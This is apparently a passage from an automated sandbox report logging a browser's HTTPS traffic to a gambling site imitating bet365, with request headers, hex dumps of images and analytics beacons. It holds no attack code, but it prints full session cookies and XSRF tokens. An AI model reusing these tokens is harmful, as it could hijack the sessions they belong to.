                                                      2025-01-12 23:48:01 UTC4096INData Raw: a5 d6 9a ae 93 29 ca 45 0c 6a 2e 6e d3 6f 26 8d df fd 38 31 46 2a fa 49 29 97 4c 12 e2 36 9d 99 5d a6 b6 ed b2 b5 1d 64 25 b9 4b 29 15 98 bc 86 8a 4f 94 d1 79 0a dd 63 1c 20 bf e6 f1 7f 56 b1 58 eb cd 43 4a 70 53 54 22 e7 4a 94 45 d8 1a 72 f9 70 5d 60 22 eb c5 92 46 33 03 20 79 1e d1 91 93 0f 85 a4 62 ca 69 e0 8b 2e 53 bd f7 ff 00 fe d3 0d 86 ad 83 3e ca a9 8b 59 cc b5 d3 1c 65 1c aa 81 29 46 67 b7 f9 6f 94 e6 dc 4c db 7d 00 72 27 1e 10 f1 69 0a 99 16 ee ea 40 6e 35 f3 41 04 36 b9 37 27 81 fe 77 1e c3 6c 28 9c 38 ca 2b c6 f1 a9 ef 21 18 ce 23 c7 1d e7 ef 42 8c 68 c6 02 0f 77 8f 6a 1b d4 d9 d0 e3 fe c0 9c 24 f0 de b6 f7 c8 ca 80 ca 22 70 9a 27 9e 2d e2 9d e3 69 19 62 ce 44 e8 3b 4e 4a c8 ac 0c 85 49 b8 d2 29 db a1 96 81 95 6b fb 91 c8 3a bd 38 94 c4 a6 6e
                                                      Data Ascii: )Ej.no&81F*I)L6]d%K)Oyc VXCJpST"JErp]`"F3 ybi.S>Ye)FgoL}r'i@n5A67'wl(8+!#Bhwj$"p'-ibD;NJI)k:8n
                                                      2025-01-12 23:48:01 UTC4096INData Raw: 58 45 15 22 f3 a7 19 b6 63 4a 53 ab 4a 6c 54 c7 02 89 09 d6 8a 49 c8 de 4b b5 79 88 d5 2e 88 cc a6 ae 33 6a 46 52 66 08 98 94 4d 4c e2 63 f1 4c 5d bd 26 89 b5 d6 67 da 5e 58 6b 37 1f 6a ca 04 50 0b 9c 4e 4a 15 78 bc e0 dc 0a 32 2b 42 ab 2a 37 9b c8 d8 27 93 2f c9 f6 89 9c 31 ff 00 de 07 1f be 2c 1d 12 06 12 06 13 bf d9 e5 1f e3 78 d2 f7 90 8c 67 08 1f eb 90 f1 f7 a5 42 3b 9c 05 b9 0d e7 db 91 b6 26 3d 4f 52 12 4e 38 9e be bf 04 2f 88 78 29 09 0c aa ca e9 6f b8 02 59 11 4c 4d 72 09 ab 18 a6 79 81 5a 75 f2 52 c4 ba 4f 7f c8 a7 81 5d 49 25 29 54 3a 9d cd a5 97 19 f3 d8 b8 48 66 38 cd ea 46 ee b8 57 bd 1b 1d cb ad 9a 7d 1a c7 40 3a ea 7e 19 25 31 41 aa 65 68 ab ab 95 59 d2 69 75 61 44 53 03 1a 12 61 45 18 3f 2c 01 1a 02 8a 2c 1f 1d 4b 4a f6 99 23 39 5f aa fa
                                                      Data Ascii: XE"cJSJlTIKy.3jFRfMLcL]&g^Xk7jPNJx2+B*7'/1,xgB;&=ORN8/x)oYLMryZuRO]I%)T:Hf8FW}@:~%1AehYiuaDSaE?,,KJ#9_
                                                      2025-01-12 23:48:01 UTC4096INData Raw: f0 8c 4f 4f a1 52 b9 b5 29 6d a5 4b 2a ea 55 15 8b 14 f5 16 9a 58 06 1a 44 c6 dd 1f 90 87 f2 56 0d 13 1f f8 d9 18 43 6e 87 4f e1 25 66 36 ef 68 0d 25 e7 db 14 58 22 13 d3 32 e0 85 d9 57 e1 22 02 d3 f4 b6 16 22 46 12 93 05 af d5 d2 66 5f 63 0b 45 96 e0 4a 36 cb 64 e9 0e ad ac 4d 7f ea 18 cb a0 30 65 a8 21 fe 53 07 05 9e 7c 18 59 65 a6 33 02 52 89 b3 47 5a 9b 2c b2 15 f2 98 4b 68 45 16 fd 16 9d 07 64 37 e9 5c 1a cf 0f 0a d7 52 6b b7 a9 60 65 a7 76 26 2e c1 9b 96 29 96 c9 e1 bf 11 7f 25 a5 59 b6 df 3a 24 31 25 a5 49 80 0c 2a 09 04 56 86 92 a2 d0 b3 46 fc 05 d3 2e fb 09 a5 42 ed 3a d8 b2 2d 55 8f 83 4c 22 54 54 e9 f5 52 df 09 59 d5 25 ff 00 25 71 3a 1a d3 39 06 ca 74 f5 08 e0 eb 0a 92 ca 96 c0 2b 77 48 2d 20 b4 7e 4a 6d a6 2e 8d 46 ce 92 96 6e ae c1 f9 4a c3
                                                      Data Ascii: OOR)mK*UXDVCnO%f6h%X"2W""Ff_cEJ6dM0e!S|Ye3RGZ,KhEd7\Rk`ev&.)%Y:$1%I*VF.B:-UL"TTRY%%q:9t+wH- ~Jm.FnJ
                                                      2025-01-12 23:48:01 UTC4096INData Raw: 1b e4 5f d9 8c b8 f3 a5 aa 40 92 1d 9e bf d4 df 87 68 05 49 4b 8e 62 2a 8b c1 57 e0 f6 61 7a 93 07 66 56 3f d2 a7 8f f5 7a bf d0 fe bc 23 b5 37 8b 6a 55 f3 cd c3 63 c7 ac 23 06 ea f5 b8 b1 bc aa aa e9 14 5d 53 5e 52 8e 11 27 16 4e eb 44 ec 98 cd 83 17 2e 39 48 aa ae 25 24 16 84 4a 82 1b 88 b1 c1 11 a6 9a b7 a2 e0 56 04 95 eb 38 5a a9 9e 4e f9 97 ce ff 00 82 0f 60 ac fd f1 dd 2e f3 d3 8f b6 e2 ed 4a 8f 5e 7c 68 cd c9 e6 29 56 5f 3a da 69 f5 51 78 4a 1a b0 ca 68 e9 73 d7 50 eb 8a c7 2f e9 22 f4 bd 9a f5 54 27 97 29 14 4a 27 15 b7 35 e2 2a 01 98 53 84 73 08 d5 9c 4e 16 92 a0 03 79 85 aa 03 e7 45 ee ec 29 0b e9 40 38 62 5c a2 9a 54 cc b9 48 b5 c2 25 f8 40 8b ca 69 e3 ba 99 79 72 32 32 85 b4 f9 6c 88 d6 3d 29 52 5b 78 80 45 94 e1 15 d6 b6 58 f7 65 21 21 b3 36
                                                      Data Ascii: _@hIKb*WazfV?z#7jUc#]S^R'ND.9H%$JV8ZN`.J^|h)V_:iQxJhsP/"T')J'5*SsNyE)@8b\TH%@iyr22l=)R[xEXe!!6
                                                      2025-01-12 23:48:01 UTC4096INData Raw: bd f1 f5 50 9c a6 9a d5 65 5c e4 c8 bf 4b 5c 18 af 2c 78 02 55 9a 72 7b 29 66 75 b9 97 e4 24 72 34 de 9c ea 35 f5 1d 83 83 3d f5 2b b1 c2 27 79 4a ef 71 68 d4 ee cd 68 59 67 21 00 1d d7 72 72 1a 13 3b c2 87 9b 16 64 05 54 f6 44 35 4d 79 a6 47 8e 92 66 0a 89 e4 fe 55 65 3b 4e 66 9b c8 af 23 a8 b1 8e cf 06 7b ea 57 63 84 56 fa 95 de e1 99 bf 4b aa c7 82 e9 9a 8a b2 90 61 ab 2f a5 0e 5c 7a 60 f2 30 f2 a3 2a ee 7d 92 8f 47 cb 8f 05 b3 0f 0c 2a 32 fa b8 71 da cc 06 e5 21 da cc 02 e0 d3 79 4a 6c f8 a2 57 fc d2 d2 59 a7 a4 8c 17 68 18 da b3 a3 6b d4 13 86 81 af 23 01 9c 51 c1 74 4e b1 d9 05 e5 88 ef a4 bb 42 60 d0 0c d3 cf c8 15 43 92 c8 0a ba a0 1f b2 63 b5 3b 2e e8 86 4a bc 05 d5 8f f2 45 51 0f 9b b3 0f 77 56 64 a1 b9 6a 54 ad 27 ff 00 11 a2 12 4c 1b 4d 80 7b
                                                      Data Ascii: Pe\K\,xUr{)fu$r45=+'yJqhhYg!rr;dTD5MyGfUe;Nf#{WcVKa/\z`0*}G*2q!yJlWYhk#QtNB`Cc;.JEQwVdjT'LM{
                                                      2025-01-12 23:48:01 UTC4096INData Raw: a5 ca cd 57 80 30 b9 af 52 b4 d8 3f b0 35 0f 4f 4c a6 41 cc e5 0a ed a3 3d 4e 7b 5a 8b 14 7a eb a3 c5 d7 47 8b ae 8f 16 9d da cf 70 94 7e ec b0 b7 57 b5 4b 73 a5 6c 89 04 6b d1 4e 47 53 65 78 b6 5e bd 4c ed 6b 4c 7b 61 7d 19 fc f6 71 53 c4 7b 87 1e 36 ac e3 a4 e4 80 32 97 e5 d9 a4 68 a7 8c f0 f7 63 65 5f 32 cd fa 58 69 e0 4c 03 77 0f 0b 0f 65 2a d3 8e f3 e1 a9 3f 84 35 a6 3d 97 d0 31 e2 65 49 ae 04 42 dd 36 7e 05 90 37 50 ed 30 b8 9b 67 17 d0 71 53 20 de 0c dc 51 a3 1e ed 7a 2c 5d 94 ab 4d 7b d1 7c 35 27 f0 9b 2d 2e ec be 1a 7f 5d c2 d3 65 13 02 84 f9 9a 18 b1 d0 1c 55 d5 49 1f 4e 27 bb db 70 69 98 7f 10 d9 34 e3 ff 00 b3 17 7a 65 02 6d d8 a1 bc ba 29 bb 2e 11 a0 f2 b2 ea 3e 9d b2 8c 65 ce e1 55 9b b2 95 69 87 72 c7 e8 be 62 17 8b 50 a0 c0 10 6e a6 a1 c7
                                                      Data Ascii: W0R?5OLA=N{ZzGp~WKslkNGSex^LkL{a}qS{62hce_2XiLwe*?5=1eIB6~7P0gqS Qz,]M{|5'-.]eUIN'pi4zem).>eUirbPn
                                                      2025-01-12 23:48:01 UTC1700INData Raw: af dc 82 9a fd c8 26 bb 13 53 58 e0 cf 53 0d bf 81 4c 36 fe 05 30 db f8 13 50 40 0c 87 e3 2f c9 8d d3 8c 3b f6 d5 83 b7 c7 89 bf d1 72 07 6a 6a 47 5d 4d 81 d7 6f fb 53 6c fe e6 45 35 0f d4 d4 4e e1 73 32 e4 e3 e8 dc a2 fe 21 ce 9d d0 a2 f8 6f d3 63 e7 5c 9a d1 84 da a5 75 c9 8d 6b a9 b6 06 70 cd b0 fe 85 c8 ee bd dc 35 c8 e6 1d c5 36 c2 4e 0e c0 1f c6 b9 31 a5 c9 82 33 63 4e 47 34 3a 6e 06 e6 2f dd 1f 8d 3a d4 01 1d 88 ee 18 5c 53 fc 0b 30 7b e7 03 71 72 a7 df bd c0 a7 f8 66 60 be e1 d7 a9 7d 3a d4 07 a7 c1 4d 48 32 2e 67 9a 6a 00 c2 85 7b f9 e9 b8 c0 23 a9 7e c2 a9 39 0d 70 e3 05 63 20 e8 be 9a 33 8c 23 a8 a6 ce ec 71 ac b3 0d c3 5f dc f8 d7 bd 3d f5 70 f6 0e a6 e6 26 ff 00 47 dc 9e f8 29 3a 8e 9a 87 22 a8 61 6c 3c 7d 0b 94 5e 0c 55 be 8d c0 a2 f8 6f d3
                                                      Data Ascii: &SXSL60P@/;rjjG]MoSlE5Ns2!oc\ukp56N13cNG4:n/:\S0{qrf`}:MH2.gj{#~9pc 3#q_=p&G):"al<}^Uo


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      121192.168.2.449873154.86.18.44434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:00 UTC1346OUTGET /member/call-request?check=1 HTTP/1.1
                                                      Host: b45032.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      Accept: application/json, text/javascript, */*; q=0.01
                                                      X-Requested-With: XMLHttpRequest
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: XSRF-TOKEN=eyJpdiI6InZQYnZrbHRNY3ZwWHNwTU5DRHpRd2c9PSIsInZhbHVlIjoieE1Kb3cwWHVIb2Roc0pBcnNyOVRcLzNnalluWWxOREpENFV5TTNwVjFFbjdsalwvVU5XTHNFQit4bWRKSFZrSWZUSklYNDBcL3FVRVBPV3lKVkM3RFdIZ3c9PSIsIm1hYyI6ImU5OWRiNmNkMWQ0YTk5NzdiYmJjODkwZjFiMjZkNjZlNTljNzViZGE1Zjg5MTBiYTVjZmY2NTcyMGM4YmQyMDkifQ%3D%3D; vanguard_session=eyJpdiI6Ik1vMzBOMWtcL1ZTZ3ZHQ3BqREs1SFB3PT0iLCJ2YWx1ZSI6Ill0NVlqZk5SdTQ1WGVuTWtrUkdxSEV4XC9DbWYrS0k2b01PVWkxenF3d0wxWUl4bVlrZDVNUTJ2NWNUVGVPZFp6VXJCS2pWSHlhdCt0MEZLMVwvZ3ppTUE9PSIsIm1hYyI6ImZkODJkNTUwOGQyYWQ0ZWRiZjhhYWM3ODQ5ODkzNjFiYjljNTVlMTY4OTMwYTdlZWI0YTEzODdjMzNkM2M5N2IifQ%3D%3D; Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD
                                                      2025-01-12 23:48:01 UTC717INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:01 GMT
                                                      Content-Type: application/json
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Alt-Svc: h3="67e285f0.t74nx2b2.com:443";ma=604800;persist=1,h2="bt5.tuf3a353.com:443";ma=604800;persist=1
                                                      Cache-Control: no-cache, private
                                                      Set-Cookie: vanguard_session=eyJpdiI6IlZhYlordnhKaWFTdkU1QzlLbUdrQVE9PSIsInZhbHVlIjoiZ0xuQ3MrSTk4K3BXa3djWGNmemoxV0NPNmp0QzFSc2xWa01hWWJuWTRBelA0UUpLcE9FZ1ZMTEhxR0dDNGV4YlwvY05wa2FyeFFzemhucWtnbE1oME9BPT0iLCJtYWMiOiJjZjg1MTJkZTQwYTE5MGFhYjg0NmFiYzgzNjhiODYzZWY4YTc4NmE1MzcwNmEyZDQ0NjgwNmZmNjM4ZmNmMzkyIn0%3D; expires=Mon, 13-Jan-2025 01:48:01 GMT; Max-Age=7200; path=/; secure; httponly; samesite=none
                                                      Server: nginx
                                                      2025-01-12 23:48:01 UTC51INData Raw: 32 38 0d 0a 5b 66 61 6c 73 65 2c 22 5c 75 35 32 39 66 5c 75 38 30 66 64 5c 75 36 37 32 61 5c 75 35 34 32 66 5c 75 37 35 32 38 22 5d 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 28[false,"\u529f\u80fd\u672a\u542f\u7528"]0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      122192.168.2.44987414.215.183.794434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:00 UTC650OUTGET /hm.gif?hca=E4D1CF12C6FA10DD&cc=1&ck=1&cl=24-bit&ds=1280x1024&vl=907&et=0&ja=0&ln=en-us&lo=0&rnd=450682172&si=947ea0365dd8ab01fc51bd9439b42930&v=1.3.2&lv=1&sn=48177&r=0&ww=1280&u=https%3A%2F%2Fb45032.com%2F%23&tt=bet365%E8%8B%B1%E5%9B%BD%E4%B8%8A%E5%B8%82%E5%AE%98%E7%BD%91 HTTP/1.1
                                                      Host: hm.baidu.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: HMACCOUNT_BFESS=E4D1CF12C6FA10DD
                                                      2025-01-12 23:48:01 UTC275INHTTP/1.1 200 OK
                                                      Cache-Control: private, max-age=0, no-cache
                                                      Content-Length: 43
                                                      Content-Type: image/gif
                                                      Date: Sun, 12 Jan 2025 23:48:01 GMT
                                                      Pragma: no-cache
                                                      Server: apache
                                                      Strict-Transport-Security: max-age=172800
                                                      X-Content-Type-Options: nosniff
                                                      Connection: close
                                                      2025-01-12 23:48:01 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                      Data Ascii: GIF89a!,L;


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      123192.168.2.44987520.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:01 UTC389OUTGET /images_plus/footer/footer-gt.png?ver=1606790107 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:48:01 UTC353INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:01 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 360
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:07 GMT
                                                      ETag: "5fc5abdb-168"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:48:01 UTC360INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 25 00 00 00 20 08 03 00 00 00 a2 8d 41 82 00 00 00 39 50 4c 54 45 9a 9a 9a 00 00 00 9a 9a 9a 80 82 85 9a 9a 9a 94 94 95 80 82 85 9a 9a 9a 9a 9a 9a 97 97 98 9a 9a 9a 96 97 97 9a 9a 9a 9a 9a 9a 9a 9a 9a 9a 9a 9a 95 96 96 9a 9a 9a 80 82 85 6a 0a 30 0c 00 00 00 13 74 52 4e 53 e6 00 3a e6 73 e6 3a 26 d8 83 4e 0e ca ad 9f 65 bf 90 a6 b6 e7 da b6 00 00 00 cb 49 44 41 54 38 cb dd 94 dd 0e 83 20 0c 46 69 ed 04 8a 20 fa fe 0f 3b 19 9d e2 4f a3 17 bb da b9 2a c9 81 7c 6d 1a 0c 3c 41 b3 c8 08 f8 27 16 53 8a c4 3b 8b 8f 96 1d ea 79 b0 64 ae 59 2c 74 46 70 49 b5 82 48 82 62 8d e6 89 15 6b 91 71 4d f5 ca 9e 71 bd 3c 22 22 7c 23 85 ad fb 57 d7 75 3d ee 7b ac c4 52 87 3b 8b a0 f0 1b 2b 97 da ea 56 de 0e 93 6e 79 69
                                                      Data Ascii: PNGIHDR% A9PLTEj0tRNS:s:&NeIDAT8 Fi ;O*|m<A'S;ydY,tFpIHbkqMq<""|#Wu={R;+Vnyi


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      124192.168.2.44987720.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:01 UTC682OUTGET /plugins/jquery-ui/images/ui-icons_777777_256x240.png HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://5getfab.segrft.com/plugins/jquery-ui/jquery-ui.min.css?ver=1606790105
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:48:01 UTC355INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:01 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 7013
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: "5fc5abd9-1b65"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:48:01 UTC3741INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 00 f0 08 04 00 00 00 45 9e 72 40 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 02 62 4b 47 44 00 77 64 ec c7 ad 00 00 00 07 74 49 4d 45 07 e0 07 0d 05 1a 36 e3 86 18 46 00 00 1a 74 49 44 41 54 78 da ed 9d 7f 6c 65 47 75 c7 3f 77 b3 4b d6 c9 86 3e 43 4b 64 8b 2a fb 43 69 fa 43 d5 be c4 8e 20 d5 56 79 6e 4b d9 24 12 b1 b7 a2 54 95 2a d9 49 b4 2e 42 4d 20 52 45 05 95 48 a8 50 ff 22 49 41 51 bb 11 ac b7 48 20 51 50 bc 1b 51 58 e8 0f 3b 4a d4 42 b0 b3 5e a5 4d 49 51 7e 49 c5 56 45 db f7 9a fe e1 a0 84 dc fe 71 7f cd dc 3b bf ee bd ef f9 3d fb ce d7 7a be ef dd 33 33 77 66 ce 99 33 73 e7 cc 9c 09 3e 8e 47 93 b1 6f d8 19 f0 18 2e bc 00 34 1c 5e 00 64 4c 10 32 31 ec 4c ec 24 bc 00 88 98
                                                      Data Ascii: PNGIHDREr@gAMAabKGDwdtIME6FtIDATxleGu?wK>CKd*CiC VynK$T*I.BM REHP"IAQH QPQX;JB^MIQ~IVEq;=z33wf3s>Go.4^dL21L$
                                                      2025-01-12 23:48:01 UTC3272INData Raw: 52 01 16 95 61 6c 47 b2 98 5a ff 1a 37 0b 22 70 73 c1 fe 7f 8c 17 e9 92 0d 3f 8f 29 e8 f2 ef 3c 6c 4e 63 ea d0 17 ac ec 87 99 dc 6b 60 11 3d 41 c4 f3 78 83 df e3 6b 00 3c 46 97 37 14 21 1e 02 16 f2 71 5d cd c1 c7 e3 d7 1f 8f 41 a3 03 79 35 dd 17 cc 03 14 45 d0 af 07 68 38 bc 2d a0 e1 f0 02 d0 70 78 01 68 38 bc 00 34 1c cd 13 80 c8 6c dc 51 50 3a a9 29 f7 06 87 74 74 b6 be 5d e6 91 58 14 80 e3 69 05 1c af 9c 5e 75 ff 00 75 d1 22 e4 6c fc fd ac 76 55 c3 03 b1 0d 62 a5 20 02 bf c1 0a a7 38 c5 f5 5c cf 0f f8 a5 42 cc a8 76 3e 16 ff 12 4f 3a 8e 70 23 77 10 72 0b b7 10 72 07 37 16 e2 9b dd 57 e4 57 33 e4 d7 33 14 e9 b6 10 b3 85 67 c8 f4 a4 20 e9 6b e0 71 36 58 e5 2f 80 25 5a a9 d9 b3 98 88 8b 2b c9 c1 ac 7a 9f 67 89 36 97 39 ce 86 62 52 25 7a f2 12 77 71 36 9e
                                                      Data Ascii: RalGZ7"ps?)<lNck`=Axk<F7!q]Ay5Eh8-pxh84lQP:)tt]Xi^uu"lvUb 8\Bv>O:p#wrr7WW33g kq6X/%Z+zg69bR%zwq6


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      125192.168.2.44987820.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:01 UTC396OUTGET /images_plus/footer/footer-gibraltar.png?ver=1606790107 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:48:01 UTC353INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:01 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 616
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:07 GMT
                                                      ETag: "5fc5abdb-268"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:48:01 UTC616INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1e 00 00 00 20 08 03 00 00 00 32 9e 38 4d 00 00 00 42 50 4c 54 45 00 00 00 5f 5f 5f 89 89 89 6a 6a 6a 58 58 58 6f 6f 6f 74 74 74 78 78 78 43 43 43 7c 7c 7c 82 82 82 66 66 66 4b 4b 4b 52 52 52 39 39 39 9a 9a 9a 94 94 94 30 30 30 a7 a7 a7 8f 8f 8f a0 a0 a0 1d 1d 1d bb f4 d5 b7 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 01 d4 49 44 41 54 28 cf 75 93 57 92 24 21 0c 44 4b de e0 cb dc ff aa 5b 35 b3 13 dd b3 1b 9d 1f 04 e2 85 52 80 60 7b 57 05 05 df 3e a9 cd e3 08 6c 9f 70 a0 98 6a f9 1f 54 ac f7 38 6a 3b 05 78 db 80 ff c1 b3 48 a5 03 7b 54 73 68 82 bf b9 15 e6 89 3b 5e 7c f1 9e b9 99 94 f7 2d 68 b3 8e 72 8e cb 17 ee 16 8d 98 cd 5f d8 5b ad 1e 03 b5 d2 09 09 10 fb 4e f2 c2 20 0d 78 12 83 b6 e6 7a b0 e8
                                                      Data Ascii: PNGIHDR 28MBPLTE___jjjXXXoootttxxxCCC|||fffKKKRRR999000tRNS@fIDAT(uW$!DK[5R`{W>lpjT8j;xH{Tsh;^|-hr_[N xz


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      126192.168.2.44987920.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:01 UTC394OUTGET /images_plus/footer/footer-GamCare.png?ver=1606790107 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:48:01 UTC353INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:01 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 420
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:07 GMT
                                                      ETag: "5fc5abdb-1a4"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:48:01 UTC420INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1a 00 00 00 1d 04 03 00 00 00 46 61 61 45 00 00 00 2d 50 4c 54 45 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 47 70 4c d7 71 e1 b0 00 00 00 0f 74 52 4e 53 af 05 e6 41 74 d2 93 15 a1 31 85 5a 22 bd 00 df c6 da 56 00 00 01 17 49 44 41 54 18 d3 63 a8 52 02 01 43 b9 77 20 c0 b0 08 c2 13 14 04 f3 98 60 3c 41 39 18 4f 35 c5 c5 12 c4 05 f1 54 17 0b 02 45 c2 0c 05 41 3c 55 c3 ea dc 14 97 56 25 85 42 39 20 6f 61 49 10 48 9f 85 d2 44 20 4f 45 f2 12 c4 14 71 90 ca c6 52 88 7d 10 53 0e 3a 41 6d 7f 08 b4 21 56 90 09 c9 2d 0a 50 9e 20 08 30 e8 0a 36 41 dd 02 e2 29 1d 34 02 cb 39 30 30 30 24 33 28 35 8a 80 78 92 60 e7 32 28 a9 08 6e
                                                      Data Ascii: PNGIHDRFaaE-PLTEGpLqtRNSAt1Z"VIDATcRCw `<A9O5TEA<UV%B9 oaIHD OEqR}S:Am!V-P 06A)49000$3(5x`2(n


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      127192.168.2.44987620.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:01 UTC393OUTGET /images_plus/footer/footer-Thwate.png?ver=1606790107 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
